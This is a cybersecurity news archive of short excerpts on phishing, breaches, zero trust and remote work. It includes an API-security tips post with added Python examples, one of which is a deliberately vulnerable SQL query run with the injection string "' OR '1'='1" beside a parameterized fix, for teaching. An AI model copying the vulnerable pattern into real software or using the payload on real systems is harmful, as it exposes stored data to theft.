Category Archives: Cybersecurity

Enterprise mobile phishing increased by 37% in Q1 2020

There was a 37 percent increase worldwide in enterprise mobile phishing encounter rate between the fourth quarter of 2019 and the first quarter of 2020, according to Lookout.

The cost of enterprise mobile phishing

The report also shows that unmitigated mobile phishing threats could cost organizations with 10,000 mobile devices as much as $35 million per incident, and up to $150 million for organizations with 50,000 mobile devices. “Smartphones and tablets are trusted devices that … More

The post Enterprise mobile phishing increased by 37% in Q1 2020 appeared first on Help Net Security.

Zoom to offer end-to-end encryption only to paying customers

As Zoom continues on its path to bring end-to-end encryption (E2EE) to users, the big news is that only paid users will have access to the option. “Free users for sure we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Zoom CEO Eric Yuan said on a company earnings call on Tuesday. Zoom encryption and … More

The post Zoom to offer end-to-end encryption only to paying customers appeared first on Help Net Security.

Office 365 users: Beware of fake company emails delivering a new VPN configuration

Phishers are impersonating companies’ IT support team and sending fake VPN configuration change notifications in the hopes that remote employees may be tricked into providing their Office 365 login credentials.

Yet another Office 365 phishing campaign

“The sender email address is spoofed to impersonate the domain of the targets’ respective organizations. The link provided in the email allegedly directs to a new VPN configuration for home access. Though the link appears to be related to … More

The post Office 365 users: Beware of fake company emails delivering a new VPN configuration appeared first on Help Net Security.

Cooking up secure code: A foolproof recipe for open source

The use of open source code in modern software has become nearly ubiquitous. It makes perfect sense: facing ever-increasing pressures to accelerate the rate at which new applications are delivered, developers value the ready-made aspect of open source components which they can plug in where needed, rather than building a feature from the ground up. Indeed, this practice has become so common that today the average application is composed mostly of open source libraries, with … More

The post Cooking up secure code: A foolproof recipe for open source appeared first on Help Net Security.

Researchers develop IoT security and privacy label

When hungry consumers want to know how many calories are in a bag of chips, they can check the nutrition label on the bag. When those same consumers want to check the security and privacy practices of a new IoT device, they aren’t able to find even the most basic facts. Not yet, at least.

The solution

A team of researchers in Carnegie Mellon University’s CyLab have developed a prototype IoT security and privacy “nutrition … More

The post Researchers develop IoT security and privacy label appeared first on Help Net Security.

Increased attacks and the power of a fully staffed cybersecurity team

The cybersecurity landscape is constantly evolving, and even more so during this time of disruption. According to ISACA’s survey, most respondents believe that their enterprise will be hit by a cyberattack soon – with 53 percent believing it is likely they will experience one in the next 12 months.

Cyberattacks continuing to increase

The survey found cyberattacks are also continuing to increase, with 32 percent of respondents reporting an increase in the number of attacks … More

The post Increased attacks and the power of a fully staffed cybersecurity team appeared first on Help Net Security.

Cybercriminals exposed 5 billion records in 2019, costing U.S. organizations over $1.2 trillion

Cybercriminals exposed over 5 billion records in 2019, costing over $1.2 trillion to U.S. organizations, according to ForgeRock. Coupled with breaches in 2018 costing over $654 billion, breaches over the last two years have cost U.S. organizations over $1.8 trillion.

Healthcare: The most targeted industry

Healthcare emerged as the most targeted industry in 2019, accounting for 382 breaches and costing over $2.45B, an increase from 164 incidents costing over $633 million in 2018. Despite healthcare … More

The post Cybercriminals exposed 5 billion records in 2019, costing U.S. organizations over $1.2 trillion appeared first on Help Net Security.

The “return” of fraudulent wire transfers

Ransomware gangs targeting businesses are currently getting more public attention, but scammers trying to trick employees into performing fraudulent wire transfers are once again ramping up their efforts, US-headquartered law firm BakerHostetler has warned.

BEC scams and fraudulent wire transfers

The same tactics have been employed by BEC scammers for years, but businesses of all sizes continue to fall for them. The scam is usually discovered when the accounting department of a company starts seeing … More

The post The “return” of fraudulent wire transfers appeared first on Help Net Security.

5G adoption, security and worldwide market trends

With 5G adoption ramping up all over the world, we sat down with Chris Pearson, President of 5G Americas, to learn more about the current 5G landscape. 5G Americas is an industry trade organization composed of leading telecommunications service providers and manufacturers like Samsung, AT&T, Intel, Ericsson, Qualcomm and T-Mobile.

What’s your take on the current global progress towards 5G?

Despite the COVID-19 crisis, 5G continues to progress at a robust pace in terms of … More

The post 5G adoption, security and worldwide market trends appeared first on Help Net Security.

Product showcase: Cloudbric Remote Access

Secure remote working is no longer just a buzzword within the cybersecurity realm – it’s become an integral part of the everyday language for all businesses in the COVID-19 era. Suddenly having a sizable number of employees working remotely presents a new challenge for those companies whose systems are not originally designed for remote access. And for many businesses and organizations, the rapid transition of the global workforce working from home means setting up their … More

The post Product showcase: Cloudbric Remote Access appeared first on Help Net Security.

How do industry verticals shape IAM priorities?

IAM priorities differ by industry vertical, and a one-size-fits-all approach to IAM doesn’t work when every industry and business within that industry is unique, according to LastPass and Vanson Bourne. Each industry vertical has unique business needs, and as a result has different areas of focus when it comes to their IAM program.

Finance focused on reducing risk, while integrating IAM infrastructure

Financial service organizations deal with higher stakes than most verticals, which inevitably impacts … More

The post How do industry verticals shape IAM priorities? appeared first on Help Net Security.

Most companies suffered a cloud data breach in the past 18 months

Nearly 80% of the companies had experienced at least one cloud data breach in the past 18 months, and 43% reported 10 or more breaches, a new Ermetic survey reveals. According to the 300 CISOs that participated in the survey, security misconfiguration (67%), lack of adequate visibility into access settings and activities (64%) and identity and access management (IAM) permission errors (61%) were their top concerns associated with cloud production environments. Meanwhile, 80% reported they … More

The post Most companies suffered a cloud data breach in the past 18 months appeared first on Help Net Security.

Tasks associated with SOX compliance continue to be significant

Only 46 percent of audit teams have been utilizing advanced technologies to optimize SOX compliance activities, a decrease from the previous year’s Protiviti survey findings.

SOX compliance challenges

The longstanding challenges associated with compliance with the Sarbanes-Oxley Act, such as the cost of compliance and reliance on time-consuming manual tasks, are being exacerbated by the COVID-19 pandemic, as finance and audit teams are required to perform audit tasks remotely. “The tasks associated with SOX compliance … More

The post Tasks associated with SOX compliance continue to be significant appeared first on Help Net Security.

Lean into zero trust to ensure security in times of agility

Bad actors are rapidly mounting phishing campaigns, setting up malicious websites and sending malicious attachments to take full advantage of the pandemic and users’ need for information, their fears and other emotions. More often than not, the goal is the compromise of login credentials. Many organizations grant more trust to users on the intranet versus users on the internet. Employees working from home – while unknowingly browsing potentially malicious websites and clicking on doctored COVID-19 … More

The post Lean into zero trust to ensure security in times of agility appeared first on Help Net Security.

How to successfully operationalize your micro-segmentation solution

Introducing a new security model into your existing infrastructure can be challenging. The task becomes even more daunting when starting with a new host-based or micro-segmentation solution. If you’ve decided on a host-based approach to segmentation, I’d like to share, based on personal experience, some advice and best practices on using this type of solution in your organization.

Discovery

The business case that drove your organization to adopt a host-based segmentation solution will serve as … More

The post How to successfully operationalize your micro-segmentation solution appeared first on Help Net Security.

Not all IT budgets are being cut, some are increasing

At a high level, and contrary to conventional wisdom, not all IT budgets are being cut. Even with the economic challenges that COVID-19 has posed for businesses, almost 38 percent of enterprises are keeping their IT budgets unchanged (flat) or actually increasing them. Yellowbrick Data received responses from more than 1,000 enterprise IT managers and executives, uncovering their infrastructure priorities during this era of economic uncertainty and disruption. “The survey brought to light some trends … More

The post Not all IT budgets are being cut, some are increasing appeared first on Help Net Security.

Security remains a major concern for enterprise IoT integration

Most companies see strong business drivers to adopt IoT as part of a broader digital transformation process. Improved efficiency and productivity, improved product/service quality, and improved customer retention and experience ranked highest as objectives. Implementation concerns, particularly around security, remain, Syniverse reveals. The study was conducted across 200 enterprise executives in North America and Europe in several key vertical industries already using or in the process of deploying IoT, including financial services, retail, manufacturing, healthcare … More

The post Security remains a major concern for enterprise IoT integration appeared first on Help Net Security.

How businesses are adapting IT strategies to meet the demands of today

Businesses are adapting IT strategies, reprioritizing cloud adoption and automated database monitoring due to the effects of a global lockdown, remote working and a focus on business continuity, according to Redgate. The report, which surveyed nearly 1,000 respondents in April 2020, reveals that while performance monitoring and backups remain the most common responsibilities for database professionals, managing security and user permissions have leapt to third and fourth place, respectively. However, there seems to be … More

The post How businesses are adapting IT strategies to meet the demands of today appeared first on Help Net Security.

When SOCs never stop: How to fill the intelligence gaps in security

Demand for security analysts and security operations centre experts is high – so high that Frost and Sullivan found only two percent unemployment in the sector and that demand continues to outstrip the supply of newly skilled professionals. (ISC)² suggests that the number of skilled professionals will have to grow from 2.8 million worldwide to 4.07 million to close the skills gap. All these roles will require the right skills and the right data. Alongside filling … More

The post When SOCs never stop: How to fill the intelligence gaps in security appeared first on Help Net Security.

The challenge of updating locally cached credentials

As organizations work to ensure remote workforce productivity, the issue of cached credentials will inevitably appear, causing a problem for the impacted user, and the IT service desk. It’s no secret that some material portion of nearly every workforce is functioning remotely. You’ve spent the last few months scurrying to establish remote connectivity, cloud-based productivity, and some form of encompassing security – all to allow your remote employees to get their job done while meeting … More

The post The challenge of updating locally cached credentials appeared first on Help Net Security.

Agile security helps software teams deliver quicker and better software

Agile adoption improves key capabilities needed to respond to current business challenges, especially those resulting from the pandemic, according to Digital.ai. With 60 percent of survey respondents saying Agile has helped increase speed to market, 41 percent agreeing they are better able to manage distributed teams, and 58 percent saying they have improved team productivity it is clear these practices are invaluable during these challenging times. “Our all-in move to the cloud in recent years … More

The post Agile security helps software teams deliver quicker and better software appeared first on Help Net Security.

Factors driving API growth in industry

This is the third in a series of articles that introduces and explains application programming interface (API) security threats, challenges, and solutions for participants in software development, operations, and protection.

Explosion of APIs

The API explosion is also driven by several business-oriented factors. First, enterprises are moving away from large monolithic applications that are updated annually at best. Instead, legacy and new applications are being broken into small, independently functional components, often rolled out as container-based … More

The post Factors driving API growth in industry appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications.

Remote work and secure access concerns

When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

API Security and Hackers: What’s the Need?

There is considerable demand for data-centric projects, which is why companies have quickly opened their data to their ecosystems through REST or SOAP APIs.

APIs are the doors to an organization’s data. That creates a tension: how do you hold the doors open to the world while keeping attackers out?

Here are some simple tips for API security.

Authentication

Don’t talk to strangers. To raise the bar for an attacker, always know who is calling your APIs: at minimum use basic access authentication (username/password) or an API key. Note that an API key is a shared secret, not an asymmetric key. Treat it like a password: send it only over TLS, store only a hash of it on the server, and make it easy to revoke.
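As an added example (not code from the article), here is what the API key advice looks like in a small server-side module: keys are random, only their SHA-256 digests are stored, lookups use a constant-time comparison, and the key can arrive either in an X-API-Key header or as a Bearer token. The key store, header names and client names are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Server-side key store: SHA-256 digest of the key -> client name.
# Only the digest is stored, so a leaked table does not yield usable keys.
# Constructed for this example; a real store would be a database row with
# a creation date and a revocation flag.
KEY_STORE: Dict[str, str] = {}


def _digest(api_key: str) -> str:
    return hashlib.sha256(api_key.encode()).hexdigest()


def issue_api_key(client_name: str) -> str:
    """Create a random 256-bit key, store its digest, return the key exactly once."""
    api_key = secrets.token_urlsafe(32)
    KEY_STORE[_digest(api_key)] = client_name
    return api_key


def revoke_api_key(api_key: str) -> bool:
    """Remove a key; returns False if it was not known."""
    return KEY_STORE.pop(_digest(api_key), None) is not None


def authenticate(api_key: str) -> Optional[str]:
    """Return the client name for a valid key, or None."""
    presented = _digest(api_key)
    client = None
    # Constant-time comparison against every stored digest so that response
    # time does not leak how much of a guess matched.
    for stored, name in KEY_STORE.items():
        if hmac.compare_digest(stored, presented):
            client = name
    return client


def authenticate_request(headers: Dict[str, str]) -> Optional[str]:
    """Accept the key in X-API-Key or as a Bearer token (header names are case-insensitive)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    key = lowered.get("x-api-key")
    if key is None:
        scheme, _, value = lowered.get("authorization", "").partition(" ")
        if scheme.lower() == "bearer" and value:
            key = value.strip()
    if not key:
        return None
    return authenticate(key)


if __name__ == "__main__":
    k = issue_api_key("billing-service")
    print("valid key ->", authenticate_request({"Authorization": "Bearer " + k}))
    print("bad key   ->", authenticate_request({"X-API-Key": "guess"}))
```

The loop over every digest is deliberate: a dictionary lookup keyed on the digest would be faster, but the constant-time loop keeps the code obviously free of timing side channels, and key stores are small.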

Encryption 

Be cryptic. Nothing should travel in the clear, whether the traffic is internal or external.

Encrypt all transfers with TLS (the successor to SSL), either one-way TLS, where only the server presents a certificate, or, better, mutual TLS (two-way TLS), where the client also presents a certificate that the server verifies.

Use current versions of TLS (1.2 or 1.3), disable the older versions, and restrict the cipher suites to strong ones.
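As an added example (not from the article), the following Python code builds the two `ssl.SSLContext` objects a server and a client would use: minimum version pinned to TLS 1.2, a forward-secret AEAD cipher list, and, when `require_client_cert` is set, mutual TLS where the server refuses any client that cannot present a certificate signed by the configured CA. The certificate and CA file paths are parameters you supply; the example does not ship any certificates, and the `describe` helper just summarises the settings an auditor would check.

```python
import ssl
from typing import List, Optional

# Cipher string for TLS 1.2: forward-secret ECDHE key exchange with AEAD ciphers only.
# TLS 1.3 suites are configured separately by OpenSSL and are all strong.
STRONG_CIPHERS = "ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL"
WEAK_MARKERS = ("RC4", "DES", "MD5", "NULL", "EXPORT")


def make_server_context(require_client_cert: bool,
                        cert_file: Optional[str] = None,
                        key_file: Optional[str] = None,
                        client_ca_file: Optional[str] = None) -> ssl.SSLContext:
    """Server side: one-way TLS when require_client_cert is False, mutual TLS when True."""
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuses SSLv3, TLS 1.0 and TLS 1.1
    ctx.set_ciphers(STRONG_CIPHERS)
    if cert_file and key_file:
        ctx.load_cert_chain(cert_file, key_file)    # the server's own certificate
    if require_client_cert:
        # Mutual TLS: the handshake fails unless the client presents a certificate
        # signed by a CA in client_ca_file. With no CA loaded every client is
        # refused, which is the safe failure mode.
        ctx.verify_mode = ssl.CERT_REQUIRED
        if client_ca_file:
            ctx.load_verify_locations(client_ca_file)
    return ctx


def make_client_context(server_ca_file: Optional[str] = None,
                        cert_file: Optional[str] = None,
                        key_file: Optional[str] = None) -> ssl.SSLContext:
    """Client side: always verifies the server; presents a client cert for mutual TLS."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)  # CERT_REQUIRED + hostname check
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers(STRONG_CIPHERS)
    if server_ca_file:
        ctx.load_verify_locations(server_ca_file)   # private CA for internal APIs
    if cert_file and key_file:
        ctx.load_cert_chain(cert_file, key_file)    # client identity for two-way TLS
    return ctx


def describe(ctx: ssl.SSLContext) -> dict:
    """Summarise the properties an auditor would check on a context."""
    weak: List[str] = [c["name"] for c in ctx.get_ciphers()
                       if any(marker in c["name"] for marker in WEAK_MARKERS)]
    return {
        "min_version": ctx.minimum_version.name,
        "client_cert_required": ctx.verify_mode == ssl.CERT_REQUIRED,
        "hostname_checked": ctx.check_hostname,
        "weak_ciphers": weak,
    }


if __name__ == "__main__":
    print("one-way server:", describe(make_server_context(require_client_cert=False)))
    print("mutual  server:", describe(make_server_context(require_client_cert=True)))
    print("client        :", describe(make_client_context()))
```

To serve with these settings wrap the listening socket with `ctx.wrap_socket(sock, server_side=True)`; a client uses `ctx.wrap_socket(sock, server_hostname=host)` so that the hostname check runs.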

Monitoring: Audit, Log, and Version 

When something goes wrong you need to be ready to troubleshoot: audit and log the relevant information on the server, and keep that history for as long as your production capacity reasonably allows. After an incident those logs become your debugging and forensic tools. Dashboards built on them are also highly recommended for monitoring API usage.

Do not forget to version every API, ideally in the URL path (for example /v1/ and /v2/), so that several versions can run concurrently and you can deprecate and retire one version while another stays in service.

Call Security Experts

Hand content inspection to dedicated tools. An ICAP (Internet Content Adaptation Protocol) server or a good antivirus engine can scan uploaded payloads before they reach your backend and your company’s data.

Share as Little as Possible 

For API security it pays to be paranoid and to reveal very little, particularly in error messages. Keep error content and email subjects to predefined, non-customizable messages. IP addresses can be mapped to locations, so do not expose them. Where possible, restrict access with IP allow lists and deny lists. Limit the number of administrators, split access into distinct roles, and hide sensitive information in all your interfaces.
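Added example, not part of the article, covering both the logging advice above and the “share as little as possible” advice: a request wrapper that writes an audit line with a correlation id for every call, enforces an IP allow list and deny list, and returns only fixed error messages to the client while the full exception goes to the server log. The address ranges, paths and the failing handler are constructed for the example; the wrapper expects `client_ip` to be the address observed by your own edge, not a client-supplied X-Forwarded-For value.

```python
import ipaddress
import logging
import uuid
from typing import Callable, Dict

log = logging.getLogger("api.audit")

# Constructed allow/deny lists; a real deployment loads them from configuration.
ALLOW_LIST = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "203.0.113.0/24")]
DENY_LIST = [ipaddress.ip_network("203.0.113.66/32")]

# The only error strings a client ever sees.
GENERIC_ERRORS = {403: "forbidden", 500: "internal error"}


def ip_allowed(client_ip: str) -> bool:
    """Deny list wins over allow list; anything unparsable is refused."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False
    if any(addr in net for net in DENY_LIST):
        return False
    return any(addr in net for net in ALLOW_LIST)


def _error(status: int, request_id: str) -> Dict:
    """Fixed, non-customizable error body: no stack trace, no internal hostnames."""
    return {"status": status,
            "body": {"error": GENERIC_ERRORS[status], "request_id": request_id},
            "request_id": request_id}


def handle(request: Dict, handler: Callable[[Dict], Dict]) -> Dict:
    """Audit-log every call and return only predefined messages to the client.

    request["client_ip"] must be the address seen by your own proxy or load
    balancer, never a raw X-Forwarded-For header, which an attacker can set.
    """
    request_id = uuid.uuid4().hex          # correlation id: in the log and in the response
    client_ip = request.get("client_ip", "")
    path = request.get("path", "")
    if not ip_allowed(client_ip):
        log.warning("rid=%s ip=%s path=%s result=denied reason=ip_filter",
                    request_id, client_ip, path)
        return _error(403, request_id)
    try:
        body = handler(request)
    except Exception:
        # Exception type, message and traceback go to the server log only.
        log.exception("rid=%s ip=%s path=%s result=error", request_id, client_ip, path)
        return _error(500, request_id)
    log.info("rid=%s ip=%s path=%s result=ok", request_id, client_ip, path)
    return {"status": 200, "body": body, "request_id": request_id}


def leaky_handler(request: Dict) -> Dict:
    """Constructed failing handler whose message must never reach the client."""
    raise RuntimeError("db01.internal unreachable; password=hunter2")


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    print(handle({"client_ip": "10.1.2.3", "path": "/v1/orders"}, lambda r: {"orders": []}))
    print(handle({"client_ip": "203.0.113.66", "path": "/v1/orders"}, lambda r: {}))
    print(handle({"client_ip": "10.1.2.3", "path": "/v1/orders"}, leaky_handler))
```

The `request_id` is the one piece of detail worth returning: support staff can find the full server-side record from it, while the client learns nothing about the backend.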

OAuth & OpenID Connect 

Delegate. A good manager delegates, and so does a good API: hand authentication and authorization to a dedicated identity provider rather than implementing them yourself.

OAuth is the mechanism that saves you from remembering 10,000 passwords. Instead of creating an account on every website, you sign in through another provider such as Facebook or Google. APIs work the same way: the API provider relies on a third-party authorization server to handle permissions. The user authenticates with that server, not with the API, and the client receives a token that it presents to the API on every call. This protects the user, who never reveals a password to the API, and it spares the API provider from storing credentials, because it only ever sees tokens.

OAuth 2.0 is a delegation protocol for authorization. To add authentication, you can layer identity on top of it: that is the OpenID Connect standard, which extends OAuth 2.0 with ID tokens.

System Protection with Throttling and Quotas 

Keep control. To protect backend bandwidth and match the capacity of your servers, restrict access to a limited number of requests per second.

You can also set limits per API and per user (or application), so that no single caller can monopolize or abuse any API.

Well-defined throttling thresholds and quotas are essential to keep requests from many sources from overwhelming the service (a distributed denial-of-service, or DDoS, attack).
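Added example, not from the article: a per-caller limiter that combines the two controls the section describes, a token bucket for the per-second rate (with a burst allowance) and a fixed daily quota. The clock is injectable so the behaviour can be tested without sleeping; the rates, burst size and quota are constructed values, and the in-memory state is an assumption (a fleet of API servers would keep it in a shared store such as Redis).

```python
import time
from dataclasses import dataclass
from typing import Callable, Dict, Tuple


@dataclass
class Bucket:
    tokens: float     # requests currently available
    updated: float    # clock reading at the last refill


class RateLimiter:
    """Per-key token bucket (burst + sustained rate) plus a fixed daily quota."""

    def __init__(self, rate_per_sec: float, burst: int, daily_quota: int,
                 clock: Callable[[], float] = time.time):
        self.rate = rate_per_sec
        self.burst = burst
        self.quota = daily_quota
        self.clock = clock                              # injectable for tests
        self._buckets: Dict[str, Bucket] = {}
        self._used: Dict[Tuple[str, int], int] = {}     # (key, day) -> requests served

    def allow(self, key: str) -> Tuple[bool, str]:
        """Decide one request for `key` (an API key, user or application id)."""
        now = self.clock()
        bucket = self._buckets.get(key)
        if bucket is None:
            bucket = self._buckets[key] = Bucket(tokens=float(self.burst), updated=now)
        # Refill at the sustained rate, capped at the burst size.
        bucket.tokens = min(float(self.burst),
                            bucket.tokens + (now - bucket.updated) * self.rate)
        bucket.updated = now
        day = int(now // 86400)                         # calendar-day quota window
        used = self._used.get((key, day), 0)
        if used >= self.quota:
            return False, "quota"                       # HTTP 429, Retry-After: next day
        if bucket.tokens < 1.0:
            return False, "throttled"                   # HTTP 429, Retry-After: 1/rate
        bucket.tokens -= 1.0
        self._used[(key, day)] = used + 1
        return True, "ok"


if __name__ == "__main__":
    limiter = RateLimiter(rate_per_sec=2.0, burst=3, daily_quota=5)
    for i in range(6):
        print(i, limiter.allow("client-a"))
```

Apply the limiter after authentication, keyed on the authenticated identity; keying on the source IP alone lets a distributed attacker sidestep it and punishes legitimate users behind one NAT.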

OWASP top 10

Avoid wasps. The OWASP (Open Web Application Security Project) Top 10 lists the ten most critical web application risks, ranked by exploitability and impact; OWASP also publishes an API Security Top 10 aimed specifically at APIs. In addition to the points above, check your application against every item on those lists.

Data Validation 

Be picky and refuse surprise presents, especially large ones. Check everything your server accepts: reject unexpected fields, oversized payloads and unexpected content types, and validate everything clients send you. Use XML or JSON schema validation to enforce types and constraints (integer, string, length, range) so that malformed input is refused before it reaches your code. This blocks whole classes of attack such as XML bombs (entity expansion). Schema validation narrows what reaches your code, but SQL injection is prevented by parameterized queries, not by input filtering alone.
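Added example, not from the article, showing both halves of this advice: a strict parser for a JSON order body (size limit, no unexpected fields, exact types, range checks) and, beside it, a deliberately vulnerable string-built SQL query next to its parameterized replacement, run against a constructed in-memory SQLite table. The schema, field names and sample rows are invented for the example, and the checks are hand-rolled to stay dependency-free where a real service would use a JSON Schema document with the jsonschema library. The XML side is not shown: Python’s built-in XML parsers do not limit entity expansion, so an XML API would use defusedxml or a parser with DTD processing disabled.

```python
import json
import sqlite3
from typing import Any, Dict, List, Tuple

MAX_BODY_BYTES = 4096                      # refuse oversized payloads before parsing
# Constructed minimal schema: field -> required Python type.
ORDER_SCHEMA: Dict[str, type] = {"customer": str, "sku": str, "quantity": int}


class ValidationError(ValueError):
    pass


def parse_order(raw: bytes) -> Dict[str, Any]:
    """Parse and validate an order body, rejecting anything not explicitly allowed."""
    if len(raw) > MAX_BODY_BYTES:
        raise ValidationError("payload too large")
    try:
        data = json.loads(raw)
    except ValueError:
        raise ValidationError("body is not valid JSON")
    if not isinstance(data, dict):
        raise ValidationError("JSON object expected")
    unexpected = sorted(set(data) - set(ORDER_SCHEMA))
    if unexpected:
        raise ValidationError("unexpected fields: " + ", ".join(unexpected))
    for name, expected_type in ORDER_SCHEMA.items():
        if name not in data:
            raise ValidationError("missing field: " + name)
        # type() rather than isinstance(): bool is a subclass of int, and
        # {"quantity": true} must not pass as an integer.
        if type(data[name]) is not expected_type:
            raise ValidationError("wrong type for " + name)
    if not 1 <= data["quantity"] <= 1000:
        raise ValidationError("quantity out of range")
    if not (data["sku"].isalnum() and len(data["sku"]) <= 32):
        raise ValidationError("invalid sku")
    if not 1 <= len(data["customer"]) <= 64:
        raise ValidationError("invalid customer")
    return data


def check_order(raw: bytes) -> str:
    """Convenience wrapper: 'ok' or the rejection reason."""
    try:
        parse_order(raw)
        return "ok"
    except ValidationError as exc:
        return str(exc)


def setup_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (customer TEXT, sku TEXT, quantity INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                     [("alice", "SKU100", 2), ("bob", "SKU200", 5)])
    return conn


def orders_vulnerable(conn: sqlite3.Connection, customer: str) -> List[Tuple[str, int]]:
    """Deliberately vulnerable: the value is spliced into the SQL text."""
    sql = "SELECT sku, quantity FROM orders WHERE customer = '" + customer + "'"
    return conn.execute(sql).fetchall()


def orders_safe(conn: sqlite3.Connection, customer: str) -> List[Tuple[str, int]]:
    """Parameterized: the driver passes the value separately, never as SQL."""
    return conn.execute("SELECT sku, quantity FROM orders WHERE customer = ?",
                        (customer,)).fetchall()


if __name__ == "__main__":
    print(check_order(b'{"customer": "alice", "sku": "SKU100", "quantity": 3}'))
    print(check_order(b'{"customer": "alice", "sku": "SKU100", "quantity": "3"}'))
    db = setup_db()
    payload = "' OR '1'='1"
    print("vulnerable:", orders_vulnerable(db, payload))   # every customer's rows
    print("safe      :", orders_safe(db, payload))         # no such customer
```

Note that the validated `customer` field would pass `parse_order` and still break the vulnerable query if it contained a quote; the parameterized query is what makes the value inert, the schema check only limits how much damage malformed input can do elsewhere.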

Infrastructure 

Stay up to date. A good API depends on a well-secured network and infrastructure, and on patched components (servers, load balancers, frameworks) that receive the latest security updates.

API Firewalling 

Build a wall. Whatever one thinks of walls elsewhere, for APIs they work. Split the protection of your API into two levels:

  • The first level is the DMZ, with an API firewall that performs cheap, early checks: message size, SQL injection patterns and any other HTTP-layer protection that stops intruders before they reach the application. The request is then forwarded to the second level.
  • The second level is the LAN, with advanced, data-aware protection mechanisms.

Set a Budget for Security Testing 

Security testing takes time and resources, and businesses need to make that investment. New functionality drives growth, but security testing should still be allocated about 5 to 10 percent of the budget. API use is growing and pushing companies to build more diverse applications; as they take advantage of these resources they need to be aware of, and close, the security holes that come with them.

About the author: Waqas Baig

Waqas Baig is a Tech Writer having experience of 8 years in journalism, reporting and editing. In his spare time, he reads and writes about tech products including gadgets, smart watches, home security products and others. If you have story ideas, feel free to share here waqasbaigblog@gmail.com

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post API Security and Hackers: What’s the Need? appeared first on Security Affairs.

People Are The Strongest Link

Here’s a little preview of what you’ll find in Episode 6 of the Security Stories podcast.

If you’re looking for behind the scenes tales from some of the leading figures in cybersecurity, then you’re in the right place. If you’re looking for anecdotes from significant security events in the past, then you’re also in the right place. 

If you’re looking for advice on how to create the perfect TikTok video, well, you’re in the wrong place, but do stick around and see if you find anything interesting.

Brian Honan

On today’s show we have a great interview with an altruistic Irishman who wears cool glasses and has a nice variety of white hats.

Nope, it’s not Bono, but we are lucky enough to have Brian Honan as our guest on this episode.

Brian is an internationally recognised expert on cybersecurity and data protection, but if you were to ask his young son what he did, the answer would be, “Dad catches hackers”.

In 2008 Brian founded Ireland’s first Computer Emergency Response Team. He’s also an adviser for Europol’s European Cybercrime Centre, and he runs his own independent security consultancy, BH Consulting, with a team based across the globe.

We cover a wide variety of topics during the interview, including the genesis of the Irish Emergency Response Team, running a company and managing a team, and why the cybersecurity industry needs more accountability.

A key part of our discussion is about people.  For many years, people have been deemed “the weakest link” when it comes to security.  Brian has an interesting take on why this isn’t the case. It’s really worth a listen.

Also in this episode is our regular “On This Day” feature. This is when my co-host Ben and I jump into the DeLorean and visit a significant cybersecurity event in the past.

This time we’re travelling back to the year 2000, when the “ILOVEYOU” worm (also known as the “Love Bug” or the “Love letter for you” attack) ended up infecting over 10 million personal Windows computers. Discover the unique story behind this attack, and the latest part of the story, which happened only a few days ago.

You can listen to this podcast on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from! You can also listen right here and now:

Listen to previous episodes of the Security Stories podcast right here

The post People Are The Strongest Link appeared first on Cisco Blogs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise of the number of at-home workers, one method that has become increasingly common over the past few months are vishing attacks, i.e., phishing campaigns executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

Despite lower number of vulnerability disclosures, security teams have their work cut out for them

The number of vulnerabilities disclosed in Q1 2020 has decreased by 19.8% compared to Q1 2019, making this likely the only true dip observed within the last 10 years, Risk Based Security reveals.

Vulnerabilities of interest disclosed in Q1 2020

Vulnerabilities disclosed in Q1 2020: What happened?

Many factors have been identified as potential contributors to this decline, including the COVID-19 pandemic, though its precise impact may not be known for another year. “Although the … More

The post Despite lower number of vulnerability disclosures, security teams have their work cut out for them appeared first on Help Net Security.

Why is SDP the most effective architecture for zero trust strategy adoption?

Software Defined Perimeter (SDP) is the most effective architecture for adopting a zero trust strategy, an approach that is being heralded as the breakthrough technology for preventing large-scale breaches, according to the Cloud Security Alliance. “Most of the existing zero trust security measures are applied as authentication and sometimes authorization, based on policy after the termination of Transport Layer Security (TLS) certificates,” said Nya Alison Murray, senior ICT architect and co-lead author of the report. … More

The post Why is SDP the most effective architecture for zero trust strategy adoption? appeared first on Help Net Security.

Employees abandoning security when working remotely

48% of employees are less likely to follow safe data practices when working from home, a report from Tessian reveals. The global shift to remote working poses new security challenges for businesses and traditional security solutions are failing to curb the problem of the insider threat and accidental data loss.

Remote work compounds insider threats

While 91% of IT leaders trust their staff to follow best security practices when working remotely, 52% of employees believe … More

The post Employees abandoning security when working remotely appeared first on Help Net Security.

Global WAN optimization market forecast to reach $1.4 billion by 2025

The WAN optimization market is expected to grow from $1,047.1 million in 2020 to $1,446.2 million by 2025, at a Compound Annual Growth Rate (CAGR) of 6.7% during the forecast period of 2020-2025, according to ResearchAndMarkets. Most cloud-based applications need good bandwidth and low latency for effective utilization. In large-scale WAN deployments, latency, bandwidth constraints, and packet losses are inevitable. WAN optimization enables enterprises and service providers to save money and reduce costs with reduced … More

